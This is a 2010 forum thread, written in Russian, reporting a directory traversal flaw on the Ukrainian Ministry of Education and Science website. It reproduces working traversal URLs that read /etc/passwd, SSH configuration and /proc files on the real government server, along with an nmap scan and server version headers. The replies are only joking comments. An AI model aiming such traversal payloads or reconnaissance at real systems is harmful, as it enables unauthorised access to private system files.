 Сайт Министерства образования и науки Украины...дырявый? |
Привіт Гість ( Вхід | Реєстрація )
| Khvastov Maxim |
 Apr 9 2010, 14:26
Пост
#1
|
 Система раннього сповiщення  Група: Trusted Members Повідомлень: 1 008 З нами з: 29-January 09 З: Донецьк Користувач №: 915 Стать: Чол  |
Министерство образования и науки Украины… Образование 2.0 говорите?
Сегодня товарищи поделились интересной ссылкой * www.mon.gov.ua/main.php?query=../../../etc/passwd Стало интересно глянуть, а чего там открыто? Бесхитростно: $ nmap www.mon.gov.ua Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2010-04-09 10:40 EEST Interesting ports on 212.111.193.189: Not shown: 1679 filtered ports PORT STATE SERVICE 80/tcp open http Nmap finished: 1 IP address (1 host up) scanned in 76.253 seconds Что-ж… Тоже вариант… 80 порт и только… Жаль… $ w3m -dump_head www.mon.gov.ua HTTP/1.1 200 OK Date: Fri, 09 Apr 2010 07:43:50 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Ну тогда стал прорезаться просто исследовательский азарт: * www.mon.gov.ua/main.php?query=../../../etc/rc * www.mon.gov.ua/main.php?query=../../../etc/rc.local * www.mon.gov.ua/main.php?query=../../../etc/ssh/ssh_config * www.mon.gov.ua/main.php?query=../../../proc/cpuinfo * www.mon.gov.ua/main.php?query=../../../proc/meminfo http://habrahabr.ru/blogs/infosecurity/90473/ |
   |
 
|
Повідомлення у даній Темі
Khvastov Maxim Сайт Министерства образования и науки Украины...дырявый? Apr 9 2010, 14:26
tiss ппц ребята - какой министр, такой и сайт :) Apr 9 2010, 16:06
Alien
какие министрЫ Apr 9 2010, 16:13
|
  |
1 Користувачів переглядають дану тему (1 Гостей і 0 Прихованих Користувачів)
0 Користувачів:
|
Lo-Fi Версія | Поточний час: 7th July 2025 - 18:37 |